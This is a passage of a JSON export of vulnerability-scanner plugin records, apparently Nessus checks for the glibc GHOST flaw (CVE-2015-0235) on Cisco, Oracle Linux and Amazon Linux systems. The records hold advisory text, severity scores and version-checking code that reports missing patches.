value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"cisco_unified_detect.nasl\");\n script_require_ports(\"Host/UCOS/Cisco Unified Presence/version\", \"cisco_cups/system_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\n\n# Leverage SSH version first\ndisplay_version = get_kb_item(\"cisco_cups/system_version\");\nver = display_version;\n# Fall back to API\nif (isnull(display_version))\n{\n display_version = get_kb_item_or_exit('Host/UCOS/Cisco Unified Presence/version');\n match = eregmatch(string:display_version, pattern:\"^(\\d+\\.\\d+\\.\\d+\\.\\d+-\\d+)($|[^0-9])\");\n if (isnull(match)) \n audit(AUDIT_VER_FORMAT, display_version); \n ver = match[1];\n}\n\nver = str_replace(string:ver, find:\"-\", replace:\".\");\n# 7.0 - 11.0 (11 not yet released)\nif(ver_compare(ver:ver, fix:\"7.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:ver, fix:\"8.6.5.15900.3\", strict:FALSE) < 0)\n fixed_ver = \"8.6.5 SU5 (8.6.5.15900-3)\";\nelse if(ver =~ \"^9\\.\" && ver_compare(ver:ver, fix:\"9.1.1.71900.2\", strict:FALSE) < 0)\n fixed_ver = \"9.1.1 SU5 (9.1.1.71900-2)\";\nelse if(ver =~ \"^10\\.[0-4]\\.\")\n fixed_ver = \"10.5.1 SU3 (10.5.1.13900-2)\"; # Any version of 10 prior to 10.5 go to 10.5.1\nelse if(ver =~ \"^10\\.5\\.1\\.\" && ver_compare(ver:ver, fix:\"10.5.1.13900.2\", strict:FALSE) < 0)\n fixed_ver = \"10.5.1 SU3 (10.5.1.13900-2)\";\nelse if(ver =~ \"^10\\.5\\.2\\.\" && ver_compare(ver:ver, fix:\"10.5.2.21900.2\", strict:FALSE) < 0)\n fixed_ver = \"10.5.2b 
(10.5.2.21900-2)\";\nelse if(ver =~ \"^11\\.0\\.\" && ver_compare(ver:ver, fix:\"11.0.1.10000.6\", strict:FALSE) < 0)\n fixed_ver = \"11.0.1.10000-6\";\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"CUCM IM and Presence Service\", display_version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + display_version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:05", "description": "The Cisco Application Control Engine (ACE) software installed on the remote Cisco IOS device is version A2(3.6d) or A5(3.1b). It is, therefore, affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validating user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2015-02-20T00:00:00", "type": "nessus", "title": "Cisco Application Control Engine GNU glibc gethostbyname Function Buffer Overflow Vulnerability (cisco-sa-20150128-ghost) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:cisco:application_control_engine_software"], "id": "CISCO-SA-20150128-ACE.NASL", "href": 
"https://www.tenable.com/plugins/nessus/81423", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81423);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68907\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus67782\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco Application Control Engine GNU glibc gethostbyname Function Buffer Overflow Vulnerability (cisco-sa-20150128-ghost) (GHOST)\");\n script_summary(english:\"Checks the ACE version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Cisco Application Control Engine (ACE) software installed on the\nremote Cisco IOS device is version A2(3.6d) or A5(3.1b). It is,\ntherefore, affected by a heap-based buffer overflow vulnerability in\nthe GNU C Library (glibc) due to improperly validating user-supplied\ninput to the __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2() functions. 
This allows a remote attacker to cause a\nbuffer overflow, resulting in a denial of service condition or the\nexecution of arbitrary code.\");\n # https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20150128-ghost.html#@ID\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a2a71f8e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus68907\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus67782\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"The vendor has stated that no release is planned to fix this issue.\nContact the vendor for other possible options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:cisco:application_control_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ace_version.nasl\");\n script_require_keys(\"Host/Cisco/ACE/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\n\nversion = get_kb_item(\"Host/Cisco/ACE/Version\");\nif (isnull(version)) audit(AUDIT_NOT_INST, 'Cisco ACE');\n\nif (\n version == \"A2(3.6d)\" ||\n version == \"A5(3.1b)\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : See solution.' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Cisco ACE\", version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:51:46", "description": "The remote Cisco device is running a version of Cisco IOS XR software that is potentially affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validated user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. 
This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\nNote that this issue only affects Cisco Network Convergence System 6000 Series routers.", "cvss3": {}, "published": "2015-03-02T00:00:00", "type": "nessus", "title": "Cisco IOS XR GNU C Library (glibc) Buffer Overflow (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-04-08T00:00:00", "cpe": ["cpe:/o:cisco:ios_xr"], "id": "CISCO-SA-20150128-GHOST-IOSXR_NCS6K.NASL", "href": "https://www.tenable.com/plugins/nessus/81596", "sourceData": "#TRUSTED 
\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81596);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/08\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69517\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco IOS XR GNU C Library (glibc) Buffer Overflow (GHOST)\");\n script_summary(english:\"Checks the IOS XR version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco device is running a version of Cisco IOS XR software\nthat is potentially affected by a heap-based buffer overflow\nvulnerability in the GNU C Library 
(glibc) due to improperly\nvalidated user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\n\nNote that this issue only affects Cisco Network Convergence System\n6000 Series routers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69517\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco bug ID CSCus69517.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/18\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xr_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\ndevice_name = \"Cisco Network Convergence System 6000 Series Router\";\n\n# Check model\nmodel = get_kb_item(\"CISCO/model\");\nif(\n !isnull(model)\n &&\n tolower(model) !~ \"ncs(6008|6k)\"\n) audit(AUDIT_HOST_NOT, device_name);\n\n# First source failed, try another source\nif (isnull(model))\n{\n model = get_kb_item_or_exit(\"Host/Cisco/IOS-XR/Model\");\n if (\n \"NCS6008\" >!< model\n &&\n \"NCS6k\" >!< model\n ) audit(AUDIT_HOST_NOT, device_name);\n}\n\n# Check rough version\n# 5.2.x / 5.4.x\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS-XR/Version\");\nif (version !~ \"^5\\.[24]\\.\")\n audit(AUDIT_HOST_NOT, device_name + \" 5.2.x / 5.4.x\");\n\nport = get_kb_item(\"Host/Cisco/IOS-XR/Port\");\nif(empty_or_null(port))\n port = 0;\n\n# Affected :\n# 5.2.4.BASE, i.e., 5.2.4\n# 5.4.0.BASE, i.e., 5.4.0\nif (\n version == \"5.2.4\"\n ||\n version == \"5.4.0\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : CSCus69517' +\n '\\n Installed release : ' + version +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port:port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, device_name, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:05", "description": "From Red Hat Security Advisory 2015:0092 
:\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : glibc (ELSA-2015-0092) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", 
"p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-static", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/nessus/81031", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0092 and \n# Oracle Linux Security Advisory ELSA-2015-0092 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81031);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"Oracle Linux 6 / 7 : glibc (ELSA-2015-0092) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0092 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. 
Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004810.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004812.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif 
(rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.0.4.el7_0.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:02", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call to either of these functions can use this flaw to execute arbitrary code with the permissions of the user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with new glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the CVE. 
Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same 'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories, 'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or 2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc package. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "cvss3": {}, "published": "2015-01-27T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : glibc (ALAS-2015-473)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2018-06-27T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo", 
"p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-devel", "p-cpe:/a:amazon:linux:glibc-headers", "p-cpe:/a:amazon:linux:glibc-static", "p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-473.NASL", "href": "https://www.tenable.com/plugins/nessus/81024", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-473.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81024);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:24\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"ALAS\", value:\"2015-473\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2015-473)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call to either of these functions\ncan use this flaw to execute arbitrary code with the permissions of\nthe user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have\nbackfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with\nnew glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the\nCVE. 
